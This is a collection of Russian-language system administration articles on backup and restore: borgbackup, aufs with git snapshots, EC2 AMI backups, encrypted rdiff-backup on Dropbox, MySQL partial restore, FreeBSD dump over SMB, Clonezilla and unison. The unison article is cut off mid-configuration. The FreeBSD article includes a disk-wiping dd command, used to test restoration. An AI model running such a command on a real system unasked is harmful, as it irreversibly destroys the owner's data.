Borg решает задачи хранения, передачи, очистки, сжатия, шифрования, дедупликации и защиты резервных копий, а также разграничивает доступ к различным репозиториям с резервными копиями. В этой статье мы рассмотрим использование инструмента borgbackup для упрощения построения системы резервного копирования. Единственный аспект, который я опущу в этой статье - шифрование. Если для вас принципиально шифровать свои бекапы, то в этом нет никакой проблемы - в официальной документации описано как использовать шифрование и вы легко сможете использовать шифрование с предложенными мной решениями. Также borg не занимается подготовкой данных для резервирования и их восстановлением. На входе и выходе вы получаете только файлы, а что и как с ними делать - решать вам. Если скомандуете "положи в бекап каталог с файлами баз mysql", то borg это сделает, но на выходе вы получите кашу вместо данных. Консистентность - это ваша задача и её обсуждение выходит за рамки этой статьи. Для решения этой задачи используется множество инструментов, зависящих от службы, данные которой вы собираетесь копировать - будь то mysqldump, снапшоты lvm, zfs или виртуальных машин. Borg представляет из себя единственный исполняемый файл. Отдельной службы, которая следит за бекапами у него нет, поэтому автоматизировать его работу придется самостоятельно. Он хранит резервные копии в репозиториях, которые представляют собой простые каталоги с файлами. Вы можете получать доступ к ним как локально, указав путь, так и по сети. Для доступа по сети используется ssh. Важной функцией borg, наличие которой повлияло на выбор именно этой системы, является возможность разграничения доступа клиентов по ключам, используемым для входа на сервер с бекапом. В статье мы рассмотрим организацию резервного копирования на предприятии, в котором я работаю. Вам не обязательно всё делать так же - решения, применяемые нами, не обязательно должны подходить всем и могут быть не оптимальными для вас. Установка В большинстве дистрибутивов уже есть пакет borgbackup и можно просто установить этот пакет. Для CentOS sudo yum install borgbackup Для Debian/Ubuntu sudo apt install borgbackup Или можно скачать исполняемый файл и установить его в систему. Скачиваем его со этой страницы и выполняем sudo cp borg-linux64 /usr/local/bin/borg sudo chown root:root /usr/local/bin/borg sudo chmod 755 /usr/local/bin/borg Подробнее об установке на другие дистрибутивы Borg необходимо установить как на сервере так и на клиентах. Настройка сервера. Часть 1 Подготовив пространство для хранения бекапов, создадим пользователя с домашним каталогом в этом пространстве. В моё случае это пользователь borg с домашним каталогом /backup/borg adduser --home /backup/borg --disabled-password borg Доступ к пользователю borg сделаем только по ключам, поэтому вход с пустым паролем по ssh должен быть отключён. Во всех известных мне дистрибутивах это сделано по умолчанию. Поправим две опции в конфиге ssh-сервера /etc/ssh/sshd_config ClientAliveInterval 10 ClientAliveCountMax 30 Перезапустим ssh-сервер sudo systemctl restart sshd Зайдем в сеанс пользователя borg sudo -i -u borg Подготовим ssh mkdir .ssh touch .ssh/authorized_keys chmod 700 .ssh chmod 600 .ssh/authorized_keys Теперь создадим репозиторий borg init -e none MyRepo В домашнем каталоге появится каталог репозитория MyRepo. На этом первоначальная настройка сервера закончена. В качестве имени сервера будем использовать backup.foo. Настройка клиента У пользователя, от имени которого будет запускаться скрипт, должен быть ssh-ключ. Если его нет, то генерируем его, выполнив команду от имени этого пользователя ssh-keygen Теперь нужно настроить отправку файлов бекапа на сервер. Как уже говорилось выше, borg занимается только хранением файлов - их подготовка ваша задача. Создадим скрипт /usr/local/bin/backup.sh, который будет готовить данные и отправлять их в бекап. #!/bin/bash #### #Готовим данные и копируем их в каталог /var/backup #Если данные не нуждаются в подготовке, то этот этап пропускаем #и вместо /var/backup указываем каталог с данными #### borg create -C lz4 borg@backup.foo:MyRepo::`date +%Y%m%d_%H%M%S` /var/backup Последняя команда отправит файлы из каталога /var/backup на сервер backup.foo, в репозиторий MyRepo, в бекап с названием в виде текущей даты/времени, сжатый алгоритмом lz4. Настраиваем cron на выполнение этого скрипта от имени нужного вам пользователя по расписанию на ваше усмотрение. Забираем с клиента файл id_rsa.pub и продолжаем настраивать сервер. Настройка сервера. Часть 2 Снова заходим в сеанс пользователя borg sudo -i -u borg На этот раз редактируем файл .ssh/authorized_keys. Добавляем строку command="/usr/bin/borg serve --restrict-to-repository /backup/borg/MyRepo --append-only",restrict <user key> Теперь обладатель ключа, зайдя на сервер backup.foo под логином borg, получит возможность создавать и просматривать бекапы только в репозитории MyRepo и ни в каком более. Также обладатель этого ключа не сможет получить shell пользователя, а значит взлом клиента не даст злоумышленнику испортить ваши бекапы или даже заглянуть в другие репозитории. Это существенно поднимает безопасность реализованной схемы. Но в данном решении есть не очевидный нюанс, о котором ниже. Опция --append-only Механизм --append-only реализован не совсем интуитивно. Дело в том, что при использовании borg с этим ключом, разрешено добавлять данные, а команды на удаление пишутся в журнал транзакций, но не применяются по настоящему. По команде delete или prune, с опцией --append-only, borg сделает вид, что бекапы удалены, но на самом деле записывает команды в журнал и перестает отображать бекапы в списке. Изменения будут применены в момент выполнения любой команды, подразумевающей внесение изменений в репозиторий, без ключа --append-only, например create, delete или prune. Подробнее эта особенность обсуждается здесь. Как мы обошли эту проблему при автоматизации удаления старых бекапов я покажу ниже. Настройка сервера. Часть 3 Теперь мы автоматизируем удаление старых бекапов, чтобы не занять всё место на сервере. Настроим всё так, чтобы хранить последние 14 копий с интервалом в день, 8 копий с интервалом в неделю и 12 копий с интервалом в месяц. Также мы обойдем проблему с неочевидным поведением опции --append-only. Заходим в сеанс пользователя borg sudo -i -u borg Поместим список имеющихся репозиториев в файл repo.list echo MyRepo > repo.list Создадим пустой файл backup.list в каталоге репозитория touch MyRepo/backup.list Создадим настройку политики хранения копий, описанную выше echo "--keep-daily 14 --keep-weekly 8 --keep-monthly 12" > MyRepo/trim.conf Подготовим скрипт /usr/local/bin/trim.sh #!/bin/bash HOME_DIR="/backup/borg/" REPO_LIST=`cat ${HOME_DIR}/repo.list` alarm(){ #### #Тут нужно предусмотреть отправку оповещения #### } trim_repo(){ #Получаем путь до репозитория и настройку сохранения бекапов REPO_DIR="${HOME_DIR}${1}" TRIM_CONF=`cat ${REPO_DIR}/trim.conf` #Получаем список бекапов в репозитории borg list --format '{id}{NL}' "${REPO_DIR}" > ${REPO_DIR}/backup_new.list #Ищем каждый ID из старого списка в новом. Если не нашли хотябы один бекап, #то код возврата будет 1. Если всё хорошо, то 0. cat ${REPO_DIR}/backup.list \\ | awk -v dir=${REPO_DIR} '{print "grep -q " $0 " " dir "/backup_new.list || exit 1" }' \\ | bash exit_code=$? if [[ $exit_code -gt 0 ]]; then #Если хотябы один ID не найден, то оповещаем ответственного за бекап человека alarm "В бекапе ${1} не хватает копий. Trim остановлен." else #Если старые бекапы на месте, то делаем trim, сохраняем новый список бекапов и удаляем старый borg prune ${TRIM_CONF} ${REPO_DIR} borg list --format '{id}{NL}' ${REPO_DIR} > ${REPO_DIR}/backup.list rm ${REPO_DIR}/backup_new.list fi } for REPO in ${REPO_LIST}; do trim_repo ${REPO} done Этот скрипт будет проверять на месте ли бекапы, которые лежали в репозитории после прошлого запуска и если ни один из них не пропал, то выполняет удаление старых копий, не попадающих под шаблон. Как видите скрипт рассчитан на то, что у вас будет множество репозиториев с разными настройками хранения. Политика хранения копий Для настройки того сколько и каких копий будет хранить borg мы использовали опции, с которыми вызывалась команда prune, записанные в файле trim.conf. Рассмотрим возможные опции подробнее
--keep-within INTERVAL храним все архивы в течение указанного промежутка времени
--keep-last, --keep-secondly сколько последних копий хранить
--keep-minutely сколько поминутных архивов хранить
-H, --keep-hourly сколько почасовых архивов хранить
-d, --keep-daily сколько ежедневны архивов хранить
-w, --keep-weekly сколько еженедельных архивов хранить
-m, --keep-monthly сколько ежемесячных архивов хранить
-y, --keep-yearly сколько ежегодных архивов хранить Команда prune удалит архивы, которые не попали под указанные опции. Опция --keep-within принимает аргумент вида "<int><char>", где char-это "H", "d", "w", "m", "y". Например, --keep-within 2d означает, что все архивы, созданные за последние 48 часов удалять нельзя. "1m" означает "31d". Архивы, попадающие под этот шаблон, не учитываются в других опциях при построении списка сохраняемых архивов. Откат команд удаления Для возврата бекапов, удалённых в режиме --append-only, нужно понять в какой момент произошло удаление и удалить транзакции, содержащие команды на удаление. Список транзакций находится в файле transactions, в каталоге репозитория. Поняв когда произошли вредоносные изменения, нужно удалить файлы транзакций с номерами вредоносной и всех последующих. Например если мы видим вот такой лог transaction 1, UTC time 2016-03-31T15:53:27.383532 transaction 5, UTC time 2016-03-31T15:53:52.588922 transaction 11, UTC time 2016-03-31T15:54:23.887256 transaction 12, UTC time 2016-03-31T15:55:54.022540 transaction 13, UTC time 2016-03-31T15:55:55.472564 И выяснили, что последняя легитимная транзакция имеет номер 5, то нужно удалить все транзакции после 5. Для этого в каталоге с репозиторием выполняем rm data/**/{6..13} borg delete --cache-only <имя репозитория> Это действие вызовет предупреждение со стороны клиентов borg при следующем обращении к репозиторию и просьбу подтвердить продолжение. Поэтому, если предполагается продолжить использование этого репозитория настроенными на него клиентами, то на всех нужно выполнить list репозитория и согласится использовать репозиторий. Либо на клиентах удалить файл rm ~/.config/borg/security/REPOID/manifest-timestamp Подробнее всё это описано здесь Извлечение и монтирование бекапов Вы можете добавить добавить свой ssh-ключ для пользователя borg без опций --restrict-to-repository и --append-only, для управления репозиториями со своего рабочего места. В этом случае команды будут выглядеть так. Получить список бекапов в репозитории borg list borg@backup.foo:<репозиторий> Получить список файлов в бекапе borg list borg@backup.foo:<репозиторий>::<имя бекапа> Извлекаем весь бекап или его часть в текущий каталог borg extract borg@backup.foo:<репозиторий>::<имя бекапа> [что извлекаем] Монтируем бекап с помощью механизма FUSE borg mount -o users borg@backup.foo:<репозиторий>::<имя бекапа> <точка монтирования> При монтировании могут возникнуть проблемы с правами доступа к файлам. В этом случае можно смонтировать через sudo, переопределив команду ssh. В этом случае ходить по смонтированному бекапу также придется с помощью sudo sudo borg mount -o users --rsh "ssh -i <ваш ключ>" borg@backup.foo:<репозиторий>::<имя бекапа> <точка монтирования> Отмонтируем командой borg umount <точка монтирования> При извлечении и монтировании можно исключить файлы по шаблону ключом --exclude. Заключение На этом всё. Я надеюсь, что эта статья станет хорошей отправной точкой при проектировании или модернизации вашей схемы резервного копирования. Borg старается следовать философии unix и хорошо занимается одним делом - управляет архивами. Используя этот инструмент вы сможете создать схему резервного копирования подходящую именно вам.

Объединение томов через aufs для отказоустойчивости и моментального восстановления (доп. ссылка 1) Автор: Gleb Kulikov [комментарии]

Объединение томов с разных физических устройств с распределением файлов/слепков файлов на предмет отказоустойчивости и моментального восстановления в случае нечисти по типу "шифровальщиков". Объединённый ресурс отдаётся через Samba и NFS. Нужно было быстро решить проблему с восстановлением после попадания пользователей под "шифровальщиков". Тем не менее, решение уже показало себя весьма эффективным и буквально спасло. Дополнительно продумывались меры по повышению надёжности, так как если не по- бедности, то по понятным соображениям, организовать правильно организованный бэкап сложно: инкрементальный бэкап периодически (сильно реже разумного) сливается на отдельный, не включенный постоянно, диск и (ещё реже), делается копия на блюрэй. Общая идея: архив разбивается на две (или больше) частей. 1-ая всегда монтируется r/o и содержит холодные и редко изменяемые данные. Эта часть лежит на одной группе томов (рейд сконфигурирован так, что несколько групп томов лежат на своих физических дисках) и с неё достаточно редко делается резервная копия на блюрэй. Для изменяемых данных выделен том, который лежит на другой группе томов (читай, другом физическом диске и в ещё одном случае, на другой ноде). Для хранения состояния файлов, сделано весьма идиотское решение, но опять-таки, практика показала его полезность. Раз в 30 минут ресурс попросту сканируется и если есть изменения, комитится в Git. База гита лежит перекрёстно, на другом томе (=> другом физическом устройстве). В основном, люди работают с доковскими и автокадовскими файлами, но как оказалось, несмотря на очевидную неатомарность, файлы в гите не бьются. За счёт сжатия, база гита пухнет умеренно. Раз в три месяца, изменяемые части ресурса сканируются на предмет не изменявшихся за это время файлов и таковые переносятся в r/o хранилище. База гита архивируется и отправляется на хранение. За счёт того, что изменяемая часть ресурса относительно маленькая, всё работает весьма шустро и не жрёт ресурсы. Изменяемые и холодные файлы "слиты" в один ресурс через aufs. А поскольку факт "стирания"/изменения файла в r/o хранилище aufs имитирует созданием спецфайла / копии изменяемого файла, работа с таким комбинированным хранилищем прозрачна. В то же время, при работе "шифровальщика" или (не)преднамеренном удалении, страдает весьма незначительная часть хранилища, инцидент легко разобрать руками и файлы восстанавливаются моментально. Перекрёстное хранение на разных физических устройствах r/o, r/w и слепков истории изменений файлов, делает сон значительно спокойнее: потерять cразу ВСЁ можно, но значительно менее вероятно, чем при задействовании механизмов перераспределения LVM/снапшотов btrfs. С последними тоже экспериментирую, но более осторожно. Вот как-то так. Ну и неоднократно приходилось доставать копии файлов с совсем небольшим временным лагом и/или сравнивать с "историческими". В обычной схеме со сжатым бэкапом можно было-бы рехнуться. PS: грабли, на которые можно наступить: если нужно поменять ACL/права доступа, это нельзя делать на объединённом ресурсе: aufs тупо скопирует на r/w раздел файлы из всех слоёв. Но если последовательно применить setacl ко всем слоям, изменения подхватятся и будут нормально работать. PPS: overlayfs в такой схеме работает скверно. PPPS: права (любые) в гите не сохраняются. В данном случае это проблема, но схема всё равно оказывается спасительной.

Скрипт для резервного копирования EC2-серверов в AMI (доп. ссылка 1) Автор: Alexander [комментарии]

Постановка задачи: есть некоторое количество EC2-серверов в AWS, разбросанных по разным регионам. Требуется автоматизировать их резервное копирование так, чтобы восстановление было легким и быстрым. Собственно, сам скрипт: ec2-automate-backup2ami.sh Описание: README.md Скрипт-обертка для запуска по крону: ec2-backup-wrapper.sh Для работы скрипта предварительно необходимо: Установить пакет ec2-api-tools (у меня он версии 1.7.1.2) Подредактировать скрипт-обертку ec2-backup-wrapper.sh, указав путь к ec2-automate-backup2ami.sh и к лог-файлу Создать в AWS IAM отдельного пользователя для бэкапов и назначить ему похожую политику: { "Version": "2012-10-17", "Statement": [ { "Sid": "Stmt1389911824000", "Effect": "Allow", "Action": [ "ec2:CreateImage", "ec2:CreateSnapshot", "ec2:CreateTags", "ec2:DeleteSnapshot", "ec2:DeregisterImage", "ec2:DescribeRegions", "ec2:DescribeSnapshotAttribute", "ec2:ModifySnapshotAttribute", "ec2:DescribeImages", "ec2:DescribeInstances", "ec2:DescribeSnapshots", "ec2:DescribeTags", "ec2:DescribeVolumeAttribute", "ec2:DescribeVolumeStatus", "ec2:DescribeVolumes" ], "Resource": [ "*" ] } ] } Создать файл с параметрами доступа для созданного пользователя: [ec2-user@zenoss ~]$ cat .stage export AWS_ACCESS_KEY=access_key export AWS_SECRET_KEY=secret_key export AWS_ACCESS_KEY_ID=access_key export AWS_SECRET_ACCESS_KEY=secret_key Указать EC2_HOME Кронтаб выглядит примерно так: [ec2-user@backup ~]$ crontab -l PATH=$PATH:/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin EC2_HOME=/usr/local SHELL=/bin/bash 00 2 * * * ./ec2-backup-wrapper.sh stage "alerts1@mydomain.cc alerts2@mydomain.cc" Результат работы скрипта записывается в лог-файл вида ec2-automate-backup2ami.stage.log. В случае ошибки выполнения он будет отправлен на указанные почтовые адреса. Стоит обратить внимание, что файл с параметрами называется .stage, а скрипт вызывается с названием без точки. После успешного выполнения, в AWS AMI появится образ с именем ec2ab_server.domain.cc_YYYY-MM-DD и со следующими тэгами: Name - название инстанса EC2 InitiatingHost - FQDN бэкап-сервера PurgeAfterFE - дата удаления образа в формате unix time PurgeAfter - дата удаления образа в формате YYYY-MM-DD (исключительно для удобства админа, скрипт использует PurgeAfterFE) PurgeAllow - разрешает автоматическое удаление образа (по умолчанию - true) Instance - ID инстанса EC2 Created - дата создания образа в формате YYYY-MM-DD Понятно, что восстановление сводится к запуску инстанса из образа PS. Скрипт создан на основе [[href="https://github.com/colinbjohnson/aws-missing-tools/tree/master/ec2-automate-backup ec2-automate-backup]] (бэкап EBS-дисков, без итерации по регионам) от colinbjohnson, за что ему большое спасибо. PS2. Возможно под OS X скрипт будет работать неправильно (см. четвертую строчку в функции get_purge_after_date()), но у меня возможности проверить нет.

Организация шифрованного бэкапа с помощью rdiff-backup, encfs и Dropbox (доп. ссылка 1) Автор: Денис Смирнов [комментарии]

Предлагается один из методов организации бэкапа данных, с которыми производится непосредственная работа и которые постоянно в процессе данной работы меняются. Подготовка Для начала я отделил те данные, с которыми я работаю сейчас от архива и результатов работы. Это относительно небольшой каталог с активными проектами. Относительно - потому что в нем 14 Гб. Dropbox Я использую dropbox, потому что он имеет одну приятную особенность - он просто работает. Без лишних усилий. 2 Гб на бесплатном аккаунте мне, конечно, мало - я пользуюсь платным. В принципе вместо dropbox'а я мог бы делать бэкап на свой сервер, но тогда частичное восстановление данных из бэкапа всегда требовало бы быстрого доступа к сети. Меня это не устраивает - я уже попадал в ситуацию, когда случайно удалял с ноутбука нужный мне большой каталог с файлами, не имея быстрого доступа к сети. Внутри Dropbox у меня большая часть данных, но рабочий каталог с данными над которыми работаю сейчас - нет. Во-первых, потому что в рабочем каталоге у меня часто может быть приватная информация, в том числе чужая. И хотя я облачным сервисам более-менее доверяю, мои клиенты - не всегда, и я должен уважать их политику безопасности. Во-вторых - данные там могут меняться слишком часто. И быть объемными - например логи отладки. Синхронизация при каждом изменении это перебор. Encfs И все-таки бэкапы (как и многие другие данные) у меня хранятся в Dropbox. А это означает, как минимум, что при утере ноутбука у злоумышленника окажется очень много ценных данных. И это недопустимо. Поэтому в Dropbox лежат шифрованные encfs-разделы. Кроме того, у Dropbox есть один неприятный недостаток - он не различает регистр в именах файлов (из-за совместимости с windows). А значит, если у меня в каталоге есть файлы, скажем, README и readme, то один из них он переименует. Encfs шифрует имена файла, за счет этого вероятность таких пересечений становится минимальной. Так что я создаю с помощью encfs внутри ~/Dropbox отдельный каталог для бэкапов, и монтирую его куда-нибудь за пределы каталога ~/Dropbox: mkdir ~/Dropbox/encfs/backup mkdir ~/backup encfs ~/Dropbox/encfs/backup ~/backup rdiff-backup Собственно для бэкапа я использую простейший скрипт: #/bin/sh from=$1 to=$2 if [ -d $to ]; then rdiff-backup "$from" $to rdiff-backup --remove-older-than 1M $to 2>&1 > /dev/null fi Он проверяет наличие каталога (на случай, если encfs раздел не смонтирован), и если он есть - выполняет бэкап. После чего удаляет из бэкапа старые snapshot'ы (старее месяца). Этот скрипт в cron'е запускается раз в сутки. Итог При таком подходе я могу потерять только результаты работы за последние сутки, и не боюсь утечки данных, несмотря на использование облачного сервиса. И да, так как я параноик, также с помощью rdiff-backup на одной из своих машин я делаю ежедневный backup всего содержимого каталога Dropbox. На тот маловероятный случай, если ошибка на самом сервисе Dropbox приведет к потере данных.

Частичное восстановление данных MySQL из бэкапа, созданного с использованием LVM (доп. ссылка 1) Автор: Андрей Татаранович [комментарии]

Я не буду описывать процесс создания резервной копии MySQL с применением менеджера томов LVM. В интернете хватает описаний этой методики. Предположим у вас уже есть бэкап, который содержит бинарные файлы баз данных. В моем случае они хранятся на выделенном сервере. Использование бинарных файлов позволяет быстро восстановить все базы на момент создания резервной копии, но вот что делать если нужно восстановить только часть баз или только одну, или же только пару таблиц или несколько удаленных записей из таблиц? Конечно можно поднять отдельный MySQL сервер на другом сервере, скопировать туда бэкап и после запуска вытащить из него нужные данные посредством mysqldump. Но что делать, если другого сервера нет или версия MySQL сервера содержит патчи, которые делают резервную копию несовместимой с дистрибутивной версией? Я постараюсь дать одно из возможных решений этой проблемы. В своем способе я также буду запускать отдельную копию MySQL сервера, но основная идея заключается в том, чтобы не копировать данные из бэкапа, а примонтировать их через сеть. Я буду использовать sshfs для этих целей. Чтобы при запуске второго сервера не изменились данные в бэкапе я применю оверлей на базе AUFS. Одна из его частей будет примонтированным бэкапом, а вторая - хранить все изменения относительно бэкапа. Таким образом я избегаю любых модификаций резервной копии. # mkdir /mnt/mysql-{backup,datadir,tmp} # sshfs root@backup.server:/backup/mysql-server /mnt/mysql-backup # mount -t aufs none /mnt/mysql-datadir -o dirs=/mnt/mysql-tmp:/mnt/mysql-backup=ro # mysqld_safe --defaults-file=/root/mysql-backup-restore.cnf /root/mysql-backup-restore.cnf - конфигурация для второго сервера, которую я сделал на базе конфига из дистрибутива. [mysqld] user=root pid-file = /root/mysql-restore.pid socket = /root/mysql-restore.sock basedir = /usr datadir = /mnt/mysql-datadir tmpdir = /tmp language = /usr/share/mysql/english skip-networking skip-external-locking key_buffer = 16M max_allowed_packet = 16M thread_stack = 192K thread_cache_size = 8 myisam-recover = BACKUP query_cache_limit = 1M query_cache_size = 16M expire_logs_days = 10 max_binlog_size = 100M [mysqldump] quick quote-names max_allowed_packet = 16M [isamchk] key_buffer = 16M !includedir /etc/mysql/conf.d/ После запуска вторая копия MySQL сервера доступна только через сокет /root/mysql-restore.sock, чем позволяет исключить посторонний доступ на время восстановления данных. Чтобы подключиться к запущенному серверу, нужно явно указать сокет: # mysql -S /root/mysql-restore.sock # mysqldump -S /root/mysql-restore.sock --add-drop-table dbname table1 table2 > dbrestore.sql После того, как данные сняты посредством mysqldump нужно остановить вторую копию сервера. Для этого нужно выполнить: # mysqladmin -S /root/mysql-restore.sock shutdown Когда дополнительный сервер остановится можно отмонтировать /mnt/mysql-datadir и /mnt/mysql-backup, и удалить директории /mnt/mysql-{backup,datadir,tmp} Несомненным преимуществом такого подхода является время, которое тратится на частичное восстановление резервной копии. Из недостатков пожалуй отсутствие sshfs и aufs во многих дистрибутивах (для centos я так и не смог найти пакета для добавления поддержки aufs). Возможно его следует заменить на любую другую реализацию union fs, но я это делать не пробовал.

Бэкап и восстановление данных из БД memcachedb и других хранилищ на базе BerkeleyDB [обсудить]

Memcachedb использует для хранения данных на диске BerkeleyDB, поэтому для резервного копирования следует использовать утилиты db_dump и db_load, для восстановления повреждённой БД можно использовать db_recover, а для проверки целостности db_verify. Для бэкапа выполняем: db_dump -h /usr/local/memcachedb data.db| gzip > memcachedb.dump.gz где через опцию "-h" передан путь к рабочей директории с базой. Gzip используем для сжатия, так как итоговый файл с переносимым дампом в текстовом формате получается очень большим. Для восстановления в пустой директории, в которую нужно восстановить БД, выполняем: zcat memcachedb.dump.gz| db_load data.db Утилита db_dump может выполняться очень долго и создаёт дамп значительного размера, превосходящего по размеру файл базы. Более быстрый способ резервного копирования заключается в использовании утилиты db_hotbackup, которая копирует целостный слепок базы. Копируем базу: db_hotbackup -h /usr/local/memcachedb -b /mnt/backup/memcachdb_backup Для восстановления достаточно скопировать в пустую директорию содержимое созданной утилитой db_hotbackup директории.

Резервное копирование и восстановление системного раздела FreeBSD с применением SMB-ресурса Автор: 62mkv [комментарии]

Резервное копирование и восстановление системного раздела FreeBSD с применением SMB-ресурса в качестве промежуточного хранилища дампа. В любой сети, как правило, полно Windows ПК с достаточно большими винчестерами, что позволяет рассматривать SMB-ресурс как удобное средство хранения резервных копий системы. В данной статье описано как можно обеспечить возможность восстановления работоспособной системы "с нуля", все что нужно - это LiveFS CD и корректный дамп работавшей некогда системы. Причем восстанавливать можно и на другое железо, принципиально это не влияет на технологию. Я, в частности, перенес систему с виртуальной машины на аппаратную (правда ОС была голая практически). Первоисточники (авторам которых огромное спасибо за их труд): http://rm-rf.ucoz.ru/publ/11-1-0-14 http://sysadmins.ru/post7706741.html#7706741 Создание дампа Подключить сетевой диск: mkdir /mnt/smb/ mkdir /mnt/smb/backup mount_smbfs //user@хост/backup /mnt/smb/backup Выгрузить конфигурацию слайсов: fdisk -p /mnt/smb/backup/fdisk.cf Выгрузить конфигурацию разделов: bsdlabel /dev/ad0s1 > /mnt/smb/backup/bsdlabel.ad0s1 Собственно, создаем дамп: dump -0aLuf /mnt/smb/backup/root.dump Восстановление на внешний винчестер Загрузиться с LiveFS CD (для виртуалки - убедиться что выставлена загрузка с CD в первую очередь) Войти в режим Fixit (CD/DVD) Для надежности (и только в том случае, если данные на имеющемся винчестере никому не нужны) (я делал это чтобы убедиться что восстановление действительно происходит по-честному) - затираем данные на имеющемся винчестере: dd if=/dev/zero of=/dev/ad0 bs=1M count=1000 Желательно убедиться что теперь при попытке загрузки с винчестера ничего хорошего не выйдет ;) Поднять сеть: ifconfig le0 192.168.0.99 255.255.255.0 192.168.0.1 Для удобства вписываем NetBIOS-имя того ПК, на котором лежит образ, в файл hosts: echo "192.168.0.10 хост" >> /etc/hosts (проверка : ping backup - должны ходить пакеты) Нужно помочь mount_smbfs загрузиться (см. также PPS в конце статьи, п.2): mkdir /boot/kernel cp /dist/boot/kernel/smbfs.ko /boot/kernel cp /dist/boot/kernel/lib*.ko /boot/kernel Создаем путь для точки монтирования: mkdir /mnt/smb mkdir /mnt/smb/backup Монтируем: mount_smbfs //user@хост/backup /mnt/smb/backup cd /mnt/smb/backup/vmtest03 Восстанавливаем таблицу слайсов: fdisk -f fdisk.cf /dev/ad0 возникает предупреждение (Class not found), а также возможно ругательство на геометрию раздела - игнорируем ! Восстанавливаем таблицу разделов и стандартный загрузочный код: bsdlabel -R -B /dev/ad0s1 bsdlabel.ad0s1 Инициализируем UFS на разделе куда будем разворачивать root: newfs /dev/ad0s1a Монтируем его: mkdir /mnt/root mount /dev/ad0s1a /mnt/root Восстанавливаем содержимое: cd /mnt/root restore -rvf /mnt/smb/backup/root.dump rm /restoresymtable Извлекаем CD, перезагружаемся. Внимание ! Если код устройства тома, на который вы восстанавливаете, отличается от кода устройства при создании (например был ad0, стал ad6), придется вручную подключать root и править /etc/fstab Запускаем редактор: vi /etc/fstab По умолчанию мы оказываемся в "командном" режиме. Переводим курсор в то место, где нам надо заменить символы, например в строку с текстом /ad0s1a под 0. Жмем "x" - 0 удаляется. Теперь жмем "i". Перешли в режим вставки. Жмем 6. Получилось /ad6s1a. Жмем Esc. Теперь мы снова в командном режиме. Жмем ":" - переходим в командную строку vi. Жмем "wq" и Enter - команда "сохранить и выйти". PS: После восстановления из дампа, если необходимо, можно поднять зеркало "вживую" - как это сделать описано в статье https://www.opennet.ru/base/sys/freebsd_gmirror_raid1.txt.html Винчестер 120 Гб дублируется (без прочей нагрузки) примерно за час - полтора. PPS: Если нужно восстановить на уже поднятый gmirror: принципиально все то же самое, только есть два нюанса: 1) если дамп был создан с обычного adX раздела, то в конфигурации корневого раздела не будет о GEOM-настройках ни слова, поэтому необходимо исправить /etc/fstab (вместо /dev/adXsY пишем /dev/mirror/gmZsY), а также добавить строку 'geom_mirror_load="YES"' в /boot/loader.conf - без этого примонтировать корень с зеркала не удастся. 2) чтобы загрузить gmirror и smbfs с LiveFS CD, можно в меню загрузки LiveFS выбрать п. 6 "Escape to loader command prompt", ввести в командной строке load smbfs, load geom_mirror, затем boot.

Использование Clonezilla для клонирования дисков с загрузкой по сети (доп. ссылка 1) [комментарии]

Clonezilla (http://clonezilla.org/) позволяет быстро клонировать диски, способом сходным с проприетарным продуктом Norton Ghost. При создании копии переносятся только занятые блоки данных, пустые области пропускаются. Поддерживается режим массового клонирования в multicast режиме, например, при тестировании, за 10 минут удалось провести клонирование исходного 5.6 Гб диска на 41 клиентскую машину. Поддерживаются ФС: ext2, ext3, ext4, reiserfs, reiser4, xfs, jfs, FAT, NTFS, UFS, HFS+ (Mac OS X). Для организации сервера для загрузки Clonezilla по сети (PXE), можно использовать следующую инструкцию для CentOS. Настраиваем NFS-сервер: mkdir -p /mnt/isoimage mkdir -p /exports/clonezilla Загружаем clonezilla-live-*.iso с сайта http://clonezilla.org в директорию /tmp, монтируем iso-образ и копируем его содержимое в директорию /exports/clonezilla: mount -o loop /tmp/clonezilla-live-$LATESTVERSION.iso /mnt/isoimage cp -a /mnt/isoimage/. /exports/clonezilla umount /mnt/isoimage В /etc/exports добавляем: /exports/clonezilla *(ro,sync) Перезапускаем NFS: service nfs restart exportfs -ra Настраиваем Tftp-сервер. mkdir -p /tmp/clonezilla mkdir /mnt/isoimage mkdir /tftpboot/images/clonezilla/ С iso-образа копируем на tftp-сервер загрузочные файлы с ядром и initrd: cp /mnt/isoimage/casper/initrd1.img /tftpboot/images/clonezilla/initrd.gz cp /mnt/isoimage/casper/vmlinuz1 /tftpboot/images/clonezilla/vmlinuz umount /mnt/isoimage Настраиваем PXE-меню: MENU DEFAULT MENU LABEL Clonezilla live label clonezilla kernel images/clonezilla/vmlinuz # Older Clonezilla # append initrd=images/clonezilla/initrd.gz boot=casper netboot nfsroot=$NFSSERVER:$NFSEXPORT # Clonezilla 1.1.0-8 append initrd=images/clonezilla/initrd.gz boot=live union=aufs netboot=nfs nfsroot=$NFSSERVER:$NFSEXPORT Загружаемся по сети и следуем инструкциям на экране.

Использование unison для двусторонней синхронизации файлов [комментарии]

Для решения задачи по синхронизации данных между двумя машинами, в ситуации когда изменения могут появиться на каждом из компьютеров, прекрасно подходит утилита unison (http://www.cis.upenn.edu/~bcpierce/unison/). При синхронизации между удаленными машинами в качестве транспорта может использоваться ssh. При обнаружении конфликтов, например, когда на обоих машинах отредактирован один и тот же файл, unison пытается разрешить конфликт автоматически, а если это не удается предоставляет пользователю интерфейс для принятия решения. Устанавливаем unison. Fedora/RHEL/CentOS: sudo yum install unison Debian/Ubuntu: sudo apt-get install unison FreeBSD: # cd /usr/ports/net/unison/ && make install Синхронизируем две локальные директории: unison /test1 /test2 В процессе будет выводиться статистика и задаваться вопросы, касающаяся синхронизации и разрешения конфликтов, направление копирования будет указано стрелкой. Для синхронизации с удаленной директорией необходимо указать: unison /test1 ssh://testserver.test.ru//test1 Чтобы выполнить синхронизацию автоматически, без интерактивного взаимодействия с пользователем необходимо использовать опцию "-batch". В случае конфликта, выполнение будет прервано с выводом соответствующего уведомления. Для определения сложной политики синхронизации можно создать файл конфигурации с определением параметров. Например, создаем файл ~/.unison/test.prf: # Определяем список директорий, которые будут синхронизированы root = /home/project root = /mnt/NFS/home/project # Указываем сохранять права доступа и владельца owner = true times = true # Определяем список поддиректорий, которые нужно синхронизировать, остальное игнорируем: path = cgi-bin path = htdocs path = conf # Определяем маски для файлов, которые не нужно синхронизировать ignore = Name .htaccess ignore = Name *~ ignore = Name .*~ ignore = Path conf/project.conf ignore = Path htdocs/rrd ignore = Path htdocs/mon ignore = Name *.o ignore = Name *.tmp ignore = Name *.log ignore = Name *.gz ignore = Name *.iso ignore = Name {,.}*{.old} # Копируем в резервные копии изменяемых файлов в отдельную директорию backup = Name * backups = true backupdir = /home/project/backup # Определяем свою команду для отображения отличий между копиями файлов при конфликте 